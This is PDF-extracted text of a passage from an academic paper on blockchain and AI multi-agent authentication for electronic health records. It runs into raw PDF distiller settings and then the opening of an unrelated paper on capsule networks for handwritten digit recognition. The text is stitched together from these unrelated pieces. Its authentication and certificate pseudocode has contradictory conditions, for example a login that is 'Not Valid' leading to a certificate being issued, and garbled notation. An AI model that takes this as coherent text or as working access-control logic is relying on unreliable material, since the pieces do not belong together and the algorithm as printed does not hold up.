The DLT based authentication agent generates a digital certificate for accessing or transferring the data from the server towards the connected devices. All these information’s were stored in the server. These intelligent DLT based multi agent systems provide the communication between users and the EHR service provider. Flowchart of the proposed methodology is shown in Fig. 4. The user interface agent is also responsible for defining the protocols for defining an accessing entity as a user. These protocols are based on the already set rules. A centralized server is used to stores all the health related information of the patient. This server is connected to the authentication agent. This server also called as the health record database consists of user credentials for accessing the entire EHR system. An authentication agent is an intelligent agent which is connected with the health record database or server which can be used to validate the entry of user. It is also used to verify the user credentials present in the health database. The proposed system consists of two intelligent based connected agents such as the user interface and the DLT based authentication agent. The Authentication agent is also connected with the DLT based system which can only Figure 3 Main characteristics of the blockchain (DLT) and AI. Full-size DOI: 10.7717/peerj-cs.323/fig-3 Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 6/14 http://dx.doi.org/10.7717/peerj-cs.323/fig-3 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ grant access to the users. This agent makes effective comparison of the already stored datasets of the users and the providers who are willing to access the datasets by issuing a digital certificate based on the blockchain technology. Various operations such as user interface establishment, user registration, comparison of the already existing data, and its maintenance where depicted by this intelligent based agents. The basic information such as username, passwords, user credentials, birth date, mobile number etc. and all the necessary information related to the health regarding the patient are stored in the health record database or server. Schematic representation of the proposed methodology is shown in Fig. 5. Working principle User interface agent acts as an interface between the user and the entire system. This user interface agent is used to establish the connection between the users and authentication agent. The user interface agent present in between the users and the authentication agent accept the sign in request from the user. The user can be a patient, a doctor or a provider healthcare. This user interface agent accepts the user credentials required for logging in. The user credentials can be a username and a password. The User interface agent is established through an application which can be either a website or a mobile based. Figure 4 Flowchart of the proposed methodology. Full-size DOI: 10.7717/peerj-cs.323/fig-4 Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 7/14 http://dx.doi.org/10.7717/peerj-cs.323/fig-4 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ The user can enter his user name and password in the provided interface. If the user forgot the username or password, it can be easily accessed by the security protocols functions present in the interface. The DLT based authentication agent receives the user name and password. All the user credentials received by the user interface agent were passed to the DLT based authentication agent for further accessing whether the credentials belongs to the saved users or not. The DLT based Authentication agent checks the obtained user name and password of the user from the stored datasets. The username and passwords were already stored in the database as shown in Fig. 6. After validating the credentials, it generates a digital certificate to the user. Connection is established in between the server and the DLT based authentication agent for accessing the EHR data. The DLT based authentication agent present in between the user interface agent and the server generates a Figure 6 Architecture of the proposed model. Full-size DOI: 10.7717/peerj-cs.323/fig-6 Figure 5 Schematic representation of the proposed methodology. Full-size DOI: 10.7717/peerj-cs.323/fig-5 Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 8/14 http://dx.doi.org/10.7717/peerj-cs.323/fig-6 http://dx.doi.org/10.7717/peerj-cs.323/fig-5 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ digital certificate in order to access the data in terms of using as well as transferring. If the digital certificate is generated, then the user can access, transfer data towards the EHR server. By this method, the EHR data cannot be easily accessed by un-authorized users or by un-authorized login. Overall Architecture of the proposed model is shown in Fig. 6. All the information regarding the logging in will be also stored in the database or the server in the form of references for next authentication process. If the credentials of the user who is willing to access the database is not stored in the server, then a user registration form will be provided so that the new user can register him for accessing the data. It is further analyzed by the authentication agent and it will grant permission to access based on the priority. Once the user is verified then he will granted permission to access the data and the connection will be established for the user to access the database. Algorithm for the agent based systems Procedure for user verification Begin Initialize for every agent V and every user U, Read the user credentials If (U = Username & password) and UI = <U, P> then, Forward to the User Interface Agent; else Enter the valid Username and Password; End if, End for Procedure for User Interface Agent Begin Initialize Each agent ai 2 V Initialize a to do list where lij j ¼ Vi Check the user and its interface Read the user credentials U = <UI> then, Forward to the DLT based Authentication Agent; else Unauthorised user; End if, End for Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 9/14 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ Algorithm for generating digital certificates Main module of the proposed algorithm starts with a login process. A user can log in from the user interface agent with the starting time as zero. The logging in time will be 1 h where the system allows the user to obtain a digital certificate. At once the user verification is done, the user particulars were updated in the server. If the user didn’t obtained a smart contract already, then the user particulars were entered in the digital certificate with the user address stored in the DC. Then the user particulars were sent towards the execution process of smart contract. At once the user particulars were updated, the system produces a digital certificate. The algorithm for generating a digital certificate is shown below login = Ok, Start_time == 0, User_Verification = OK If login == Valid and Start_time >= 1 hour: Then: Update User_particulars; Smart Contract = No If login == Not Valid or Start_time <= 1 hour Then: DC = Digital_Certificate(User_particulars); Address = DC_Address; Send User_particulars to address: Excute Smart_Contract = SC_Address (User_particulars); If Smart_Contract = Ok Then: Add block_credit to DC_Blockchain; Issue (Digital_Certificate); End If End If End If Motivation and scope � The proposed methodology provides the health data as privacy preserved and secured. � The proposed system is monitored and maintained by the AI-based multi agent systems. � The proposed system consists of two intelligent based connected agents such as the user interface and the DLT based authentication agent. � These multi agents can be used to validate the user ans also yto generate the digital certificates. � Digital certificates are generated by blockchain based Intelligent agents for restricting the un-authorized users. � AI and blockchain based intelligent agents communicates between the users and the EHR server through the network. Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 10/14 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ Comparison with existing methods In this section a detailed comparison between the proposed methodology and the existing methods for providing privacy and security for health datasets are depicted. In the CARE Model, the intelligent agent based system is employed where each and every entities and their role are monitored. In Multi Agent System for Patient-Centered method, only the intelligent agents were assigned for individual patients. In agent based medical Server and wireless sensor network, only individual agents are assigned for all the entities such as the patient, supervisor, doctor and manager. In algorithms based on biometrics based technologies, EEG, ECG and finger print sensors were employed for the authentication purpose. In the proposed method, intelligent multi agents along with the DLT based systems is used for user authentication and also for providing access to the EHR datasets. Table 1 shows the comparison of techniques for various E-health security methods. CONCLUSION AND FUTURE WORK E-Health systems can be a better alternative to maintain the medical records globally and connectedly and can be further accessed the clinical information on the basis of its requirement. Due to the fast improvement of the users among the EHR, E-Health and M-Health, applications based on mobile devices which provide medical services such as the data collections of online users were facing a challenge in securing, storing and accessing the data. Patient’s health record which was used in various treatments should be secured. These records were used by various doctors and specialists of the healthcare while providing the treatments to patients. A combination of AI bases intelligent agents and blockchain technology is proposed in this article in order to provide security and privacy for the EHR from unauthorized access and usage. Intruders can change the information, alter the entire data, introduce an unauthenticated and false data, etc. This system avoids these types of attacks caused by the un-authorized users and users with the help of intelligent agents and blockchain technology by generating a smart contract. This proposed architecture uses various AI-based intelligent based agents and blockchain for the entire process. Future enhancement in this work can be the addition of the biometric based systems for improved security. Table 1 Comparison of techniques for various EHR security method. EHR security methods Technique used CARE model Modules for each actors and their role Patient-centered multi agent system Agents for individual users Body sensor network and agent based medical server Agents for patient, supervisor, doctor and manager Biometric based method Electrocardiogram and finger print for the authentication purpose. Biometrics based method Electrocardiogram and photoplethysmography for the authentication purpose. Proposed method Blockchain along with multi agents for user interface, authentication, smart contract for accessing the EHR data Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 11/14 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests The author declares that they have no competing interests. Author Contributions � Fahad F. Alruwaili conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.323#supplemental-information. REFERENCES Ahmed Z, Mohamed K, Zeeshan S, Dong XQ. 2020. Artificial intelligence with multi-functional machine learning platform development for better healthcare and precision medicine. Database 2020:baaa010 DOI 10.1093/database/baaa010. Bali J, Garg R, Bali RT. 2019. Artificial intelligence (AI) in healthcare and biomedical research: why a strong computational/AI bioethics framework is required? Indian Journal of Ophthalmology 67(1):3–6 DOI 10.4103/ijo.IJO_1292_18. Bonab TH, Masdari M. 2015. Security attacks in wireless body area networks: challenges and issues. Academie Royale des Sciences d Outre-mer Bulletin des Seances 4(4):100–107. Chelli K. 2015. Security issues in wireless sensor networks: attacks and countermeasures. In: Proceedings of the World Congress on Engineering. Drosatos G, Efraimidis PS, Williams G, Kaldoudi E. 2016. Towards privacy by design in personal e-Health systems. Available at https://www.scitepress.org/Papers/2016/58214/pdf/index.html. Fatema N, Brad R. 2014. Security requirements, counterattacks and projects in healthcare applications using WSNs: a review. ArXiv preprint arXiv:1406.1795. Gruson D, Helleputte T, Rousseau P, Gruson D. 2019. Data science, artificial intelligence, and machine learning: opportunities for laboratory medicine and the value of positive regulation. Clinical Biochemistry 69:1–7 DOI 10.1016/j.clinbiochem.2019.04.013. Grzonka D, Jakóbik A, Kołodziej J, Pllana S. 2018. Using a multi-agent system and artificial intelligence for monitoring and improving the cloud performance and security. Future Generation Computer Systems 86:1106–1117 DOI 10.1016/j.future.2017.05.046. Habib K, Torjusen A, Leister W. 2015. Security analysis of a patient monitoring system for the Internet of Things in eHealth. In: Proceedings of the International Conference on eHealth, Telemedicine, and Social Medicine (eTELEMED'15). Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 12/14 http://dx.doi.org/10.7717/peerj-cs.323#supplemental-information http://dx.doi.org/10.7717/peerj-cs.323#supplemental-information http://dx.doi.org/10.7717/peerj-cs.323#supplemental-information http://dx.doi.org/10.1093/database/baaa010 http://dx.doi.org/10.4103/ijo.IJO_1292_18 https://www.scitepress.org/Papers/2016/58214/pdf/index.html http://dx.doi.org/10.1016/j.clinbiochem.2019.04.013 http://dx.doi.org/10.1016/j.future.2017.05.046 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ Harel Y, Gal IB, Elovici Y. 2017. Cyber Security and the role of intelligent systems in addressing its challenges. ACM Transactions on Intelligent Systems and Technology 8(4):12 DOI 10.1145/3057729. Ismail Keshta, Ammar Odeh. 2020. Security and privacy of electronic health records: Concerns and challenges. Egyptian Informatics Journal DOI 10.1016/j.eij.2020.07.003. Kumar P, Lee H-J. 2011. Security issues in healthcare applications using wireless medical sensor networks: a survey. Sensors 12(1):55–91 DOI 10.3390/s120100055. Li S, Zhao S, Yang P, Andriotis P, Xu L, Sun Q. 2019. Distributed consensus algorithm for events detection in cyber physical systems. IEEE Internet of Things Journal 6(5):2299–2308 DOI 10.1109/JIOT.2019.2906157. Niksaz P, Young Researchers and Elite Club, Mashhad Branch. 2015. Wireless body area networks: attacks and countermeasures. International Journal of Scientific & Engineering Research 6(9):556–568. OECD. 2013. Recommendation of the Council concerning Guidelines governing the Protection of Privacy and Transborder Flows of Personal Data. C(80)58/FINAL, 79, 1–27. Available at https://www.oecd.org/sti/ieconomy/2013-oecd-privacy-guidelines.pdf. Om S, Talib M. 2011. Wireless ad-hoc network under black-hole attack. International Journal of Digital Information and Wireless Communications (IJDIWC) 1(3):591–596. Partala J, Keräneny N, Särestöniemi M, Hämäläinen M, Iinatti J, Jämsä T, Reponen J, Seppänen T. 2013. Security threats against the transmission chain of a medical health monitoring system. In: 2013 IEEE 15th International Conference on e-Health Networking, Applications & Services (Healthcom), 9–12 October 2013, Lisbon, Portugal. Piscataway: IEEE. Perdana A, Robb A, Balachandran V, Rohde F. 2020. Distributed ledger technology: its evolutionary path and the road ahead. Information & Management. 103316 DOI 10.1016/j.im.2020.103316. Saleem S, Ullah S, Kwak KS. 2011. A study of IEEE 802.15. 4 security framework for wireless body area networks. Sensors 11(2):1383–1395 DOI 10.3390/s110201383. Saleem S, Ullah S, Yoo HS. 2009. On the Security issues in wireless body area networks. International Journal of Digital Content Technology and its Applications 3(3):178–184 DOI 10.4156/jdcta.vol3.issue3.22. Santos-Pereira C, Augusto AB, Cruz-Correia R, Correia ME. 2013. A secure RBAC mobile agent access control model for healthcare institutions. In: Proceedings of the 26th IEEE International Symposium on Computer-Based Medical Systems. Piscataway: IEEE. Shinde SS, Patil D. 2015. Review on security and privacy for mobile healthcare networks: from a quality of protection perspective. International Journal of Engineering Research 3(6):1–10. Stein JD, Rahman M, Andrews C, Trager EH, Narayanaswamy P, Hanauer DA. 2019. Evaluation of an algorithm for identifying ocular conditions in electronic health record data. JAMA Ophthalmology 137(5):491–497 DOI 10.1001/jamaophthalmol.2018.7051. Sun X, Zou J, Li L, Luo M. 2020. A blockchain-based online language learning system. Telecommunication Systems DOI 10.1007/s11235-020-00699-1. Tsochev G, Trifonov R, Yoshinov R, Manolov S, Popov G, Pavlova G. 2018. Some Security Model Based on Multi Agent Systems. In: International Conference on Control, Artificial Intelligence, Robotics & Optimization (ICCAIRO). Wellington K. 2013. Cyberattacks on medical devices and hospital networks: legal gaps and regulatory solutions. Santa Clara High Technolohy Law Journal 30(2):139. Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 13/14 http://dx.doi.org/10.1145/3057729 http://dx.doi.org/10.1016/j.eij.2020.07.003 http://dx.doi.org/10.3390/s120100055 http://dx.doi.org/10.1109/JIOT.2019.2906157 https://www.oecd.org/sti/ieconomy/2013-oecd-privacy-guidelines.pdf http://dx.doi.org/10.1016/j.im.2020.103316 http://dx.doi.org/10.3390/s110201383 http://dx.doi.org/10.4156/jdcta.vol3.issue3.22 http://dx.doi.org/10.1001/jamaophthalmol.2018.7051 http://dx.doi.org/10.1007/s11235-020-00699-1 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ Wiljer D, Urowitz S, Apatu E, DeLenardo C, Eysenbach G, Harth T, Pai H, Leonard KJ, Canadian Committee for Patient Accessible Health Records. 2008. Patient accessible electronic health records: exploring recommendations for successful implementation strategies. Journal of Medical Internet Research 10(4):e34 DOI 10.2196/jmir.1061. Zhang R, Liu L. 2010. Security models and requirements for healthcare application clouds. In: 2010 IEEE 3rd International Conference on CloudComputing. Piscataway: IEEE. Zhang K, Yang K, Liang X, Su Z . 2015. Security and privacy for mobile healthcare networks: from a quality of protection perspective. IEEE Wireless Communications. 22(4):104–112. Zhang Y, Wu S, Jin B, Du J. 2017. A blockchain-based process provenance for cloud forensics. In: 2017 3rd IEEE International Conference on Computer and Communications (ICCC). Piscataway: IEEE, 2470–2473. Zhang N, Zhong S, Tian L. 2017. Using blockchain to protect personal privacy in the scenario of online taxi-hailing. International Journal Of Computers Communications & Control 12(6):886–902 DOI 10.15837/ijccc.2017.6.2886. Zheng Z, Xie S, Dai HN, Wang H. 2018. Blockchain challenges and opportunities: a survey. International Journal of Web and Grid Services 14(4):352–375 DOI 10.1504/IJWGS.2018.095647. Zurita L, Nøhr C. 2004. Patient opinion-EHR assessment from the users perspective. Studies in Health Technology and Informatics 107(2):1333–1336. Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 14/14 http://dx.doi.org/10.2196/jmir.1061 http://dx.doi.org/10.15837/ijccc.2017.6.2886 http://dx.doi.org/10.1504/IJWGS.2018.095647 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.323 Artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records ... Introduction Conclusion and future work References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_tdfta4ovtfdmzgmjiwx5sfifvm ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-031 1 Deep Capsule Network Handwritten Digit Recognition Yuxing Tan School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: Yuxing_Tan@foxmail.com Hongge Yao School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 835092445@qq.com Abstract—Aiming at the weakness of CNN that is not sensitive to the changes of relative position and angle, a method of digital handwritten recognition based on deep capsule network is researched. The capsule network represents multiple attributes of an entity through a group of capsules composed of neurons, which effectively preserves the information about the position and posture of the entity. Dynamic routing algorithm makes the information interaction between capsules more clearly, and can determine the pose of the entity more accurately. While solving the shortcomings of convolutional neural networks, it also integrates the advantages of CNN and considers the relative position of it’s lack, so that the recognition effect is improved. The design implements a deep capsule network, reduces the amount of trainable parameters by changing the size of the convolution kernel, expands on the original network structure, adds a convolution after the convolution layer, and a process of dynamic routing on the main dynamic routing is added, and the number of iterations is changed for experimentation, which makes the accuracy of network recognition higher on the MNIST data set. Keywords-Component; Deeplearning; 